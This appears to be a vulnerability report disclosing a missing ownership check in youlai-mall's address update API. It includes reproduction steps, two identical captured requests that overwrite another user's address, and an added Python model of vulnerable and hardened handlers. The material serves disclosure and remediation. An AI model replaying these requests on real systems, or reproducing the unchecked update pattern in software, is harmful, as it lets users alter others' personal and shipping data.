
The youlai-mall application has an improper access control vulnerability that allows unauthorized users to update other users’ addresses. #19

@Hwwg

Description

Contributors: Huang Weigang

1. Affected Version

youlai-mall (latest)
https://github.com/youlaitech/youlai-mall

2. Vulnerability Location

PUT /mall-ums/app-api/v1/addresses/{addressId}

3. Code Analysis

First, the API takes addressId as a path parameter.

[image: controller method for PUT /mall-ums/app-api/v1/addresses/{addressId}]

In the implementation behind it, the service then updates the address row by its id (updateById) without checking that the row belongs to the currently logged-in member; the id is taken from the request and trusted as-is.

[images: service/mapper code performing the update by id with no ownership check]

Vulnerability Reproduction

  • Log in as User A and obtain a valid Authorization token.
  • Intercept the address update request: PUT /mall-ums/app-api/v1/addresses/{addressId} .
  • Set the JSON body field id to an address ID that belongs to User B (the service passes the body id to updateById, so the path addressId can be changed to User B's ID as well, but it is the body id that selects the row).
  • Change any of the writable fields (e.g., consigneeName , consigneeMobile , province , city , area , detailAddress , defaulted ) to new values.
  • Send the modified request with User A's token.
  • Observe a 200 OK response and confirm that User B's address record has been updated: a horizontal privilege escalation.

Captured requests and responses. Both were sent with a body id of 218 while the path keeps addressId 1; the Authorization header is not included in the capture. The response `msg` "一切ok" means "all OK".

USER-A:

```json
{
  "request_data": {
    "method": "PUT",
    "url": "http://10.15.196.160:9999/mall-ums/app-api/v1/addresses/1",
    "json": {
      "id": 218,
      "consigneeName": "郝先瑞",
      "consigneeMobile": "18866668888",
      "province": "上海",
      "city": "上海市",
      "area": "浦东新区",
      "detailAddress": "1111",
      "defaulted": 0
    },
    "params": {},
    "data": {},
    "files": {}
  },
  "response_data": {
    "code": "00000",
    "data": null,
    "msg": "一切ok"
  }
}
```

USER-B:

```json
{
  "request_data": {
    "method": "PUT",
    "url": "http://10.15.196.160:9999/mall-ums/app-api/v1/addresses/1",
    "json": {
      "id": 218,
      "consigneeName": "郝先瑞",
      "consigneeMobile": "18866668888",
      "province": "上海",
      "city": "上海市",
      "area": "浦东新区",
      "detailAddress": "1111",
      "defaulted": 0
    },
    "params": {},
    "data": {},
    "files": {}
  },
  "response_data": {
    "code": "00000",
    "data": null,
    "msg": "一切ok"
  }
}
```
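The following is an added example, not code from youlai-mall or from this report. It models the behaviour described in the Code Analysis and Reproduction sections above with an in-memory address table: `vulnerable_update` selects the row by the body `id` and never compares the row's owner with the caller, while `hardened_update` loads the row by the path `addressId`, requires the owner to match the caller, ignores any `id` in the body, and scopes the "reset other defaults" step to the caller's own rows. `reproduce` replays the PoC (User A's session, body id 218 belonging to User B) against either handler. All names, the member ids, and the seed rows are this example's own assumptions.

```python
from dataclasses import dataclass
from typing import Dict, Tuple

# JSON field -> attribute; the writable fields named in the report.
WRITABLE = {
    "consigneeName": "consignee_name",
    "consigneeMobile": "consignee_mobile",
    "detailAddress": "detail_address",
    "defaulted": "defaulted",
}


@dataclass
class Address:
    id: int
    member_id: int  # owner of the row; the value the missing check should compare
    consignee_name: str
    consignee_mobile: str
    detail_address: str
    defaulted: int = 0


@dataclass
class Response:
    status: int
    msg: str


def seed() -> Dict[int, Address]:
    """Constructed table (assumption): user A is member 1 and owns address 1,
    user B is member 2 and owns address 218. Both rows are their owner's default."""
    return {
        1: Address(1, 1, "user-a", "13800000001", "A street", defaulted=1),
        218: Address(218, 2, "user-b", "13800000002", "B street", defaulted=1),
    }


def apply_fields(target: Address, body: dict) -> None:
    for json_key, attr in WRITABLE.items():
        if json_key in body:
            setattr(target, attr, body[json_key])


def vulnerable_update(db: Dict[int, Address], caller: int, path_id: int, body: dict) -> Response:
    """Behaviour the report describes: the row is chosen by body["id"] (the path id
    is ignored) and nothing checks target.member_id == caller."""
    target = db.get(body.get("id"))
    if target is None:
        return Response(404, "not found")
    if body.get("defaulted") == 1:
        for addr in db.values():  # clears the default flag across every member
            addr.defaulted = 0
    apply_fields(target, body)
    return Response(200, "ok")


def hardened_update(db: Dict[int, Address], caller: int, path_id: int, body: dict) -> Response:
    """Ownership-scoped version: the row comes from the path id, its owner must be the
    caller, body["id"] is never consulted, and the default reset only touches the caller's rows."""
    target = db.get(path_id)
    # 404 rather than 403 so the endpoint does not confirm that other users' ids exist.
    if target is None or target.member_id != caller:
        return Response(404, "not found")
    if body.get("defaulted") == 1:
        for addr in db.values():
            if addr.member_id == caller:
                addr.defaulted = 0
    apply_fields(target, body)
    return Response(200, "ok")


def reproduce(handler, path_id: int, defaulted: int = 0) -> Tuple[int, str, int, int]:
    """Replays the PoC: caller is user A (member 1), body id is B's address 218.
    Returns (status, B's consignee name, B's defaulted flag, A's defaulted flag)."""
    db = seed()
    body = {"id": 218, "consigneeName": "attacker", "consigneeMobile": "18866668888",
            "detailAddress": "1111", "defaulted": defaulted}
    resp = handler(db, 1, path_id, body)
    return resp.status, db[218].consignee_name, db[218].defaulted, db[1].defaulted


if __name__ == "__main__":
    print("vulnerable, path 1, defaulted=1:", reproduce(vulnerable_update, 1, defaulted=1))
    print("hardened, path 218, defaulted=1:", reproduce(hardened_update, 218, defaulted=1))
    print("hardened, path 1, defaulted=1:  ", reproduce(hardened_update, 1, defaulted=1))
```

Against the vulnerable handler the PoC rewrites B's row and, with `defaulted=1`, also clears A's own default flag, which is the cross-account inconsistency noted in the impact section. Against the hardened handler a path id of 218 is rejected, and a path id of 1 only ever touches A's own row no matter what `id` the body carries.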

4. Impact Description

  • Enables unauthorized modification of another user’s address data by a different authenticated user.
  • Breaks access control due to missing ownership validation and ignoring the path addressId in favor of the user-controlled body id .
  • Causes privacy and integrity issues (altering PII and delivery details), potentially redirecting shipments or enabling fraud/social engineering.
  • If defaulted=1 is sent, the service resets other default addresses without scoping the reset to the owner of the targeted row, so the flags of different accounts are modified together and become inconsistent.
  • If address IDs are predictable or enumerable, the blast radius extends to any user’s address, increasing systemic risk and potential regulatory noncompliance.
